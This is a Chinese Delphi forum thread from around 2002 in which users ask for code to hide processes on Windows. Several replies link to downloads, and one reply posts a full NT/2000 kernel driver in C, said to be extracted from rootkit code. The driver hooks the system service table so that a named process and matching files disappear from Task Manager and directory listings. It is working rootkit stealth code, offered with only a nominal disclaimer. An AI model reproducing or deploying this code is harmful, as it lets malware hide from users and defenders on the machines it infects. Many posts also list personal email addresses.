C
chudx
Unregistered / Unconfirmed
GUEST, unregistred user!
chudx@263.net<br>也给我一份吧,万份感谢
N
netameng
Unregistered / Unconfirmed
GUEST, unregistred user!
放到 delphibbs.mychangshu.com 上<br>[
][]
][]
B
bjf2001
Unregistered / Unconfirmed
GUEST, unregistred user!
请给我一份,多少分数自己说,bjf2000@163.net
E
evering
Unregistered / Unconfirmed
GUEST, unregistred user!
请到http://njhhack.freehomepages.com/中部,<br>下载“WiN9X,NT,W2K下进程深度隐藏的源程序”,有2套源码<br>相关原理在本论坛可找到该作者的帖子,<br><br>不过很奇怪的是我前几天在XP下成功地隐藏了,今天试的时候竟然有问题!
茶
茶叶蛋
Unregistered / Unconfirmed
GUEST, unregistred user!
去看看hubdog的葵花宝典version 2.5,<br><br>用“Hook”和“黑人”做关键词查询。<br><br>到这里down源程序:http://njhhack.freehomepages.com/source/hideproc.zip<br><br>程序虽然不是我写的,但要记得给分哦。
B
bjf2002
Unregistered / Unconfirmed
GUEST, unregistred user!
在w2k下不能隐藏
J
jyh_jack
Unregistered / Unconfirmed
GUEST, unregistred user!
evering,茶叶蛋,<br>为什么你们说的网址,我都没法去呢???<br>
热
热血
Unregistered / Unconfirmed
GUEST, unregistred user!
NT/2000下面用驱动实现真正的进程,文件,目录隐藏<br> qinzm<br>最近看了一下RootKit的代码,把其中进程文件目录隐藏的代码整理出来,<br>重新编译成一个完整可用的驱动,可以实现定制的进程文件目录的隐藏,<br>隐藏后,进程管理器无法看到,文件和目录也无法看到,但知道绝对路径的<br>情况下,可以正常使用隐藏的文件,只对NT/2000有效,编译后的驱动只有2k多.<br> 程序用于实验,请勿非法使用<br><br>//////////////////////////////////////////////////////////////////////////////////////<br>//<br>// FileName : D:/Temp/Hide/Driver.c<br>// Version : 1.0<br>// Creater : QinzhiMing<br>// Date : 2002:2:25 14:42<br>// Comment : <br>//<br>//////////////////////////////////////////////////////////////////////////////////////<br><br>#include "ntddk.h"<br>#include "Driver.h"<br>#include "stdio.h"<br><br>/////////////////////////////////////////////////////////////////////////////<br><br>char g_szHideProcName[] = "Install.exe";<br>WCHAR g_wszHideFileName[] = L"Install";<br><br>ULONG g_nProcessNameOffset;<br>BOOL g_hide_proc = TRUE;<br><br>/////////////////////////////////////////////////////////////////////////////<br><br>NTSTATUS DriverEntry(IN PDRIVER_OBJECT pDriverObject, IN PUNICODE_STRING pRegisterPath)<br>{<br> int i;<br> NTSTATUS ntStatus;<br> PDEVICE_OBJECT pDeviceObject;<br> WCHAR wchrDeviceName[] = L"//Device//Hide";<br> WCHAR wchrDeviceLinkName[] = L"//DosDevices//Hide";<br> UNICODE_STRING wszDeviceName;<br> UNICODE_STRING wszDeviceLinkName;<br> <br> RtlInitUnicodeString(&wszDeviceName, wchrDeviceName);<br> ntStatus = IoCreateDevice(pDriverObject, 0, &wszDeviceName, 0x00008000, 0, FALSE, &pDeviceObject);<br> if (ntStatus != STATUS_SUCCESS)<br> goto Exit0;<br> RtlInitUnicodeString(&wszDeviceLinkName, wchrDeviceLinkName);<br> ntStatus = IoCreateSymbolicLink(&wszDeviceLinkName, &wszDeviceName);<br> if (ntStatus != STATUS_SUCCESS)<br> {<br> IoDeleteDevice(pDeviceObject);<br> goto Exit0;<br> }<br> for (i = 0; i < IRP_MJ_MAXIMUM_FUNCTION; i++)<br> pDriverObject->MajorFunction = OnDriverDispatch;<br> pDriverObject->DriverUnload = OnDriverUnload;<br> GetProcessNameOffset();<br> HookSysCall();//Hook系统服务<br>Exit0:<br> return ntStatus;<br>}<br><br>/////////////////////////////////////////////////////////////////////////////<br><br>void GetProcessNameOffset()<br>{<br> int i;<br> PEPROCESS CurrentProc;<br> CurrentProc = PsGetCurrentProcess();<br> for (i = 0; i < 3 * PAGE_SIZE; i++) <br> {<br> if(!strncmp("System", (PCHAR)CurrentProc + i, strlen("System")))<br> g_nProcessNameOffset = i;<br> }<br>}<br><br>/////////////////////////////////////////////////////////////////////////////<br><br>BOOL GetProcessName(PCHAR pszName)<br>{<br> char *pszTempName;<br> PEPROCESS CurrentProc; <br><br> if (g_nProcessNameOffset) <br> {<br> CurrentProc = PsGetCurrentProcess();<br> pszTempName = (PCHAR)CurrentProc + g_nProcessNameOffset;<br> strncpy(pszName, pszTempName, NT_PROCNAMELEN);<br> pszName[NT_PROCNAMELEN] = 0;<br> return TRUE;<br> } <br> return FALSE;<br>}<br><br>/////////////////////////////////////////////////////////////////////////////<br><br>void HookSysCall()<br>{<br> OldZwQuerySystemInformation = (ZWQUERYSYSTEMINFORMATION)(SYSTEMSERVICE(ZwQuerySystemInformation));<br> OldZwQueryDirectoryFile = (ZWQUERYDIRECTORYFILE)(SYSTEMSERVICE(ZwQueryDirectoryFile));<br> _asm cli;<br> (ZWQUERYSYSTEMINFORMATION)(SYSTEMSERVICE(ZwQuerySystemInformation)) = NewZwQuerySystemInformation;<br> (ZWQUERYDIRECTORYFILE)(SYSTEMSERVICE(ZwQueryDirectoryFile)) = NewZwQueryDirectoryFile;<br> _asm sti;<br>}<br><br>/////////////////////////////////////////////////////////////////////////////<br><br>void UnHookSysCall()<br>{<br> _asm cli;<br> (ZWQUERYSYSTEMINFORMATION)(SYSTEMSERVICE(ZwQuerySystemInformation)) = OldZwQuerySystemInformation;<br> (ZWQUERYDIRECTORYFILE)(SYSTEMSERVICE(ZwQueryDirectoryFile)) = OldZwQueryDirectoryFile;<br> _asm sti;<br>}<br><br>/////////////////////////////////////////////////////////////////////////////<br><br>NTSTATUS NewZwQuerySystemInformation(<br> IN ULONG SystemInformationClass,<br> IN PVOID SystemInformation,<br> IN ULONG SystemInformationLength,<br> OUT PULONG ReturnLength)<br>{<br> NTSTATUS ntStatus;<br> CHAR szProcessName[PROCNAMELEN];<br> ANSI_STRING astrProcName;<br> ANSI_STRING astrHideProcName;<br><br> struct SYSTEM_PROCESS *Curr;<br> struct SYSTEM_PROCESS *Prev;<br> RtlInitAnsiString(&astrHideProcName, g_szHideProcName);<br> GetProcessName(szProcessName);<br> ntStatus = ((ZWQUERYSYSTEMINFORMATION)(OldZwQuerySystemInformation))(<br> SystemInformationClass,<br> SystemInformation,<br> SystemInformationLength,<br> ReturnLength);<br> <br> if(!NT_SUCCESS(ntStatus))<br> goto Exit0;<br> if (memcmp(szProcessName, g_szHideProcName, strlen(g_szHideProcName)) == 0)//比较当前进程是否隐藏进程,是就退出,不对隐藏进程的做任何限制<br> goto Exit0;<br> if (SystemInformationClass != 5)<br> goto Exit0;<br> Curr = (struct SYSTEM_PROCESS *)SystemInformation;<br> Prev = NULL;<br>Loop:<br> if (Curr == NULL)<br> goto Exit0;<br> RtlUnicodeStringToAnsiString(&astrProcName, &(Curr->ProcessName), TRUE);<br> if ((astrProcName.Length > 0) && (astrProcName.Length < 255))<br> ;<br> else<br> goto Next;<br> if (RtlCompareString(&astrProcName, &astrHideProcName, TRUE) != 0)<br> goto Next;<br> if (Prev)<br> {<br> if (Curr->NextEntryDelta)<br> Prev->NextEntryDelta += Curr->NextEntryDelta;<br> else<br> Prev->NextEntryDelta = 0;<br> }<br> else<br> {<br> if (Curr->NextEntryDelta)<br> (char *)SystemInformation += Curr->NextEntryDelta;<br> else<br> SystemInformation = NULL;<br> }<br>Next:<br> RtlFreeAnsiString(&astrProcName);<br> Prev = Curr;<br> if (Curr->NextEntryDelta)<br> (char *)Curr += Curr->NextEntryDelta;<br> else<br> Curr = NULL;<br> goto Loop;<br>Exit0:<br> return ntStatus;<br>}<br><br>/////////////////////////////////////////////////////////////////////////////<br><br>NTSTATUS OnDriverDispatch(IN PDEVICE_OBJECT pDeviceObject, IN PIRP Irp)<br>{<br>/* PIO_STACK_LOCATION IrpStack;<br> Irp->IoStatus.Status = STATUS_SUCCESS;<br> Irp->IoStatus.Information = 0;<br> IrpStack = IoGetCurrentIrpStackLocation(Irp);*/<br> Irp->IoStatus.Status = STATUS_SUCCESS;<br> IoCompleteRequest(Irp, IO_NO_INCREMENT);<br> return Irp->IoStatus.Status;<br>}<br><br>/////////////////////////////////////////////////////////////////////////////<br><br>void OnDriverUnload(IN PDRIVER_OBJECT pDriverObject)<br>{<br> WCHAR wchrDeviceLinkName[] = L"//DosDevices//Hide";<br> UNICODE_STRING wszDeviceLinkName;<br> <br> UnHookSysCall();<br> RtlInitUnicodeString(&wszDeviceLinkName, wchrDeviceLinkName);<br> IoDeleteSymbolicLink(&wszDeviceLinkName);<br> IoDeleteDevice(pDriverObject->DeviceObject);<br>}<br><br>/////////////////////////////////////////////////////////////////////////////<br><br>NTSTATUS NewZwQueryDirectoryFile(<br> IN HANDLE hFile,<br> IN HANDLE hEvent OPTIONAL,<br> IN PIO_APC_ROUTINE IoApcRoutine OPTIONAL,<br> IN PVOID IoApcContext OPTIONAL,<br> OUT PIO_STATUS_BLOCK pIoStatusBlock,<br> OUT PVOID FileInformationBuffer,<br> IN ULONG FileInformationBufferLength,<br> IN FILE_INFORMATION_CLASS FileInfoClass,<br> IN BOOLEAN bReturnOnlyOneEntry,<br> IN PUNICODE_STRING PathMask OPTIONAL,<br> IN BOOLEAN bRestartQuery)<br>{<br> NTSTATUS ntStatus;<br> CHAR szProcessName[PROCNAMELEN];<br> BOOL bLastOne;<br> int iPos;<br> int iLeft;<br> pDirEntry pCurrDir;<br> pDirEntry pLastDir;<br> <br> GetProcessName(szProcessName);<br> ntStatus = ((ZWQUERYDIRECTORYFILE)(OldZwQueryDirectoryFile)) (<br> hFile,<br> hEvent,<br> IoApcRoutine,<br> IoApcContext,<br> pIoStatusBlock,<br> FileInformationBuffer,<br> FileInformationBufferLength,<br> FileInfoClass,<br> bReturnOnlyOneEntry,<br> PathMask,<br> bRestartQuery);<br> if (!NT_SUCCESS(ntStatus))<br> goto Exit0;<br> if (memcmp(szProcessName, "Install", 7) == 0)<br> goto Exit0;<br> pCurrDir = (pDirEntry)FileInformationBuffer;<br> pLastDir = NULL;<br> do <br> {<br> bLastOne = !(pCurrDir->dwLenToNext);<br> if (RtlCompareMemory((PVOID)&pCurrDir->suName[0], (PVOID)&g_wszHideFileName[0], 14) == 14) <br> {<br> if (bLastOne) <br> {<br> if (pCurrDir == (pDirEntry)FileInformationBuffer)<br> ntStatus = 0x80000006;<br> else <br> pLastDir->dwLenToNext = 0;<br> break;<br> } <br> else <br> {<br> iPos = ((ULONG)pCurrDir) - (ULONG)FileInformationBuffer;<br> iLeft = (DWORD)FileInformationBufferLength - iPos - pCurrDir->dwLenToNext;<br> RtlCopyMemory((PVOID)pCurrDir, (PVOID)((char *)pCurrDir + pCurrDir->dwLenToNext), (DWORD)iLeft);<br> continue;<br> }<br> }<br> pLastDir = pCurrDir;<br> pCurrDir = (pDirEntry)((char *)pCurrDir + pCurrDir->dwLenToNext );<br> } while (!bLastOne);<br>Exit0:<br> return ntStatus;<br>}<br>
P
pukerno3
Unregistered / Unconfirmed
GUEST, unregistred user!
我也要<br>pukerno.3@163.com
N
newsxy
Unregistered / Unconfirmed
GUEST, unregistred user!
我也要<br>SUNXY@ZCHX.COM
T
tsedlinux
Unregistered / Unconfirmed
GUEST, unregistred user!
LISTEN
墙
墙头草
Unregistered / Unconfirmed
GUEST, unregistred user!
可以给我来一份吗?见了代码就给加分<br>zzgyiyuan@yeah.net
C
CodeSaint
Unregistered / Unconfirmed
GUEST, unregistred user!
我也要一份<br>chen_saint@popmail.com
P
phpexpert
Unregistered / Unconfirmed
GUEST, unregistred user!
也需要一份,谢谢<br><br>zixia@china.com.cn